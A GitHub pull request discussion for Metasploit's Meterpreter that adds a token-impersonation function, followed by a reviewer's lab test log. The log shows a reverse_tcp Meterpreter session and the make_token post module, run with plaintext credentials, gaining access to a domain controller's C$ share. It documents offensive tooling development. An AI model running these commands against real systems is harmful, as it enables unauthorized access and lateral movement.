Add update_token function to stdapi

[salu90]

This PR adds the request_sys_config_update_token function to the stdapi extension. We can use this function along with a token handle to update the security context of a Meterpreter session. This is achieved by:

1. Applying the token to the current thread (via ImpersonateLoggedOnUser)
2. Storing the token handle within remote->thread_token

Point 1 should be enough to cover impersonation for any command running from the session thread (command_process_inline). Since not all commands fall into this category, point 2 ensures Meterpreter has the token handle available for other tasks creating a new thread (command_process_thread) or a new process (request_sys_process_execute).

This addition comes in combination with rapid7/metasploit-framework#18022 made in the MSF repository, which contains the ruby-side code and an example module leveraging the new update_token functionality.

[smcintyre-r7]

Thanks for the changes and this submission! I tested it out with a Server 2019 instance and a couple of different logon types. Everything seems to be working as expected. As noted by the module some logon types will cause some API calls to fail, but I don't think there's anything to do about that.

I'll go ahead and get this landed. Thanks again!

Testing Output

msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.70:61682) at 2023-06-01 17:02:10 -0400
sessions -i -1
[*] Starting interaction with 5...

meterpreter > getuid
Server username: MSFLAB\aliddle
meterpreter > sysinfo
Computer        : WINDOWS-11-VM
OS              : Windows 10 (10.0 Build 22621).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter > ls \\\\dc\\C$
[-] stdapi_fs_stat: Operation failed: Access is denied.
meterpreter > run post/windows/manage/make_token username=smcintyre password=Password2! domain=msflab.local

[*] Executing rev2self to revert any previous token impersonations
[*] Executing LogonUserA with the flag LOGON32_LOGON_NEW_CREDENTIALS to create a new security context for msflab.local\smcintyre
[*] Impersonating the new security context...
[+] The session should now run with the new security context!
[!] Remember that this will not have any effect on local actions (i.e. getuid will still show the original user)
meterpreter > getuid
Server username: MSFLAB\aliddle
meterpreter > ls \\\\dc\\C$
Listing: \\dc\C$
================

Mode              Size        Type  Last modified              Name
----              ----        ----  -------------              ----
040777/rwxrwxrwx  0           dir   2023-02-10 09:59:20 -0500  $Recycle.Bin
040777/rwxrwxrwx  0           dir   2022-08-05 15:16:50 -0400  Documents and Settings
040777/rwxrwxrwx  0           dir   2023-05-25 13:52:45 -0400  PerfLogs
040555/r-xr-xr-x  0           dir   2023-05-31 17:00:51 -0400  Program Files
040777/rwxrwxrwx  0           dir   2023-05-31 17:00:51 -0400  Program Files (x86)
040777/rwxrwxrwx  0           dir   2022-08-05 15:26:01 -0400  ProgramData
040777/rwxrwxrwx  0           dir   2022-08-05 15:16:50 -0400  Recovery
040777/rwxrwxrwx  0           dir   2023-02-10 12:53:39 -0500  System Volume Information
040555/r-xr-xr-x  0           dir   2023-02-10 09:59:14 -0500  Users
040777/rwxrwxrwx  0           dir   2023-05-30 08:36:40 -0400  Windows
100666/rw-rw-rw-  1342177280  fil   2023-06-01 08:37:35 -0400  pagefile.sys

meterpreter >